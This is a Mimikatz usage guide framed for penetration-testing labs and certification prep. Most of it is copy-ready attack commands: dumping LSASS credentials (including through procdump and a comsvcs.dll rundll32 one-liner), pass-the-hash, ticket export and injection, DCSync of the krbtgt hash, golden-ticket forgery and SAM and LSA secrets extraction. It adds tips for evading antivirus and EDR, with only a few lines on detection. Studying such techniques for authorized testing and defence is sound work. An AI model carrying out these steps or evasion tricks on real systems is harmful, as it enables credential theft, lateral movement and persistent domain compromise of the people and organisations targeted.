Mimikatz, created by Benjamin Delpy, is one of the most well-known post-exploitation tools in the penetration tester’s arsenal. It can extract plaintext passwords, NTLM hashes, Kerberos tickets, and more from Windows memory. Understanding Mimikatz — how it works, how to use it, and how defenders detect it — is essential for anyone preparing for OSCP, CRTP, or real-world red team engagements. This guide covers practical Mimikatz usage in authorized lab environments.
What Mimikatz Does
Mimikatz primarily targets the Local Security Authority Subsystem Service (LSASS) process in Windows, which stores authentication credentials in memory to enable single sign-on. By reading LSASS memory, Mimikatz can extract:
- Plaintext passwords (on Windows 7/2008 and older, or when WDigest is enabled)
- NTLM password hashes
- Kerberos TGTs and TGS tickets
- DPAPI master keys
On modern Windows 10/11 and Server 2019/2022, plaintext passwords are no longer stored by default. However, NTLM hashes and Kerberos tickets remain extractable and are powerful enough for lateral movement.
Getting Mimikatz
Download the latest compiled release from the official GitHub repository: https://github.com/gentilkiwi/mimikatz/releases. The archive contains mimikatz.exe (32-bit) and mimikatz_x64.exe (64-bit). You almost always want the 64-bit version on modern systems.
Be aware that AV/EDR will flag the binary immediately. In lab environments, add an exclusion or use an obfuscated variant (Invoke-Mimikatz from PowerSploit, or custom compiled builds).
Running Mimikatz
Launch mimikatz.exe from an elevated command prompt (you need local admin or SYSTEM privileges):
mimikatz.exe
You’ll land at the mimikatz # prompt. First, request debug privileges:
privilege::debug
You should see Privilege '20' OK. Without this, most commands will fail.
Dumping Credentials from LSASS
sekurlsa::logonpasswords
This is the classic Mimikatz command. It reads LSASS memory and displays the credential material of every logon session still cached there, which usually means everything since the last reboot:
sekurlsa::logonpasswords
Output is organized by logon session and includes:
- Username and domain
- NTLM hash
- SHA1 hash
- Cleartext password (if WDigest is enabled or on older OS)
- Kerberos tickets
sekurlsa::msv
Extracts only NTLM hashes (faster and less noisy than logonpasswords):
sekurlsa::msv
Dumping LSASS to a File (Without Running Mimikatz On-Target)
A common evasion technique is to dump LSASS to a minidump file using built-in Windows tools, exfiltrate the dump, and run Mimikatz offline:
# Using Task Manager: right-click lsass.exe in Details → Create dump file
# Or via PowerShell with ProcDump:
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
Then on your local machine:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
This avoids running Mimikatz directly on the target, reducing EDR detection risk.
sekurlsa::tickets
Lists all Kerberos tickets in memory:
sekurlsa::tickets
kerberos::list /export
Exports all tickets to .kirbi files in the current directory:
kerberos::list /export
These tickets can be used with Impacket’s ticketer.py or injected into another session.
kerberos::ptt (Pass-the-Ticket)
Inject a .kirbi ticket into the current session:
kerberos::ptt ticket.kirbi
After injection, you can use the ticket to access resources — for example, connecting to a file share or running psexec against a machine without knowing the password.
Pass-the-Hash
Mimikatz enables pass-the-hash attacks using the sekurlsa::pth command. You can spawn a new process using a captured NTLM hash without knowing the plaintext password:
sekurlsa::pth /user:Administrator /domain:CORP /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:cmd.exe
A new cmd.exe window opens with the identity of the target account. From there, you can access network resources or use Impacket tools with the impersonated identity.
Golden and Silver Tickets
lsadump::dcsync (DCSync)
DCSync mimics a domain controller replication request to pull any account's hash from Active Directory without logging on to the DC directly:
lsadump::dcsync /domain:corp.local /user:krbtgt
You need Domain Admin or a user with Replicating Directory Changes All rights.
kerberos::golden — Forging a Golden Ticket
With the KRBTGT hash, you can forge a Golden Ticket valid for any user:
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /ticket:golden.kirbi
Then inject it:
kerberos::ptt golden.kirbi
Golden Tickets are persistent — they survive changes to the impersonated account's password (only resetting the KRBTGT password twice invalidates them) and remain valid for 10 years by default.
SAM Database Dumping
When you have SYSTEM privileges on a local machine, you can extract the SAM database without touching LSASS:
token::elevate
lsadump::sam
Or extract LSA secrets (including cached domain credentials):
lsadump::secrets
Detection and Evasion Notes
Defenders watch for:
- Event ID 4624 (logon) with unusual patterns
- Event ID 10 (LSASS access) in Sysmon logs — the key telltale for Mimikatz
and harden against LSASS credential theft with:
- Credential Guard (moves credential secrets out of LSASS's reach on modern Windows, so memory reads return nothing useful)
- Protected Users security group membership
To reduce detection in authorized engagements, consider:
- Running Mimikatz from memory (Invoke-Mimikatz)
- Dumping LSASS via comsvcs.dll:
rundll32.exe C:\windows\System32\comsvcs.dll MiniDump <PID> lsass.dmp full
- Using obfuscated loaders or custom compiles
Understanding how Mimikatz works at the API level (OpenProcess, ReadProcessMemory) helps you explain findings to blue teams and demonstrate detection gaps during post-engagement reviews.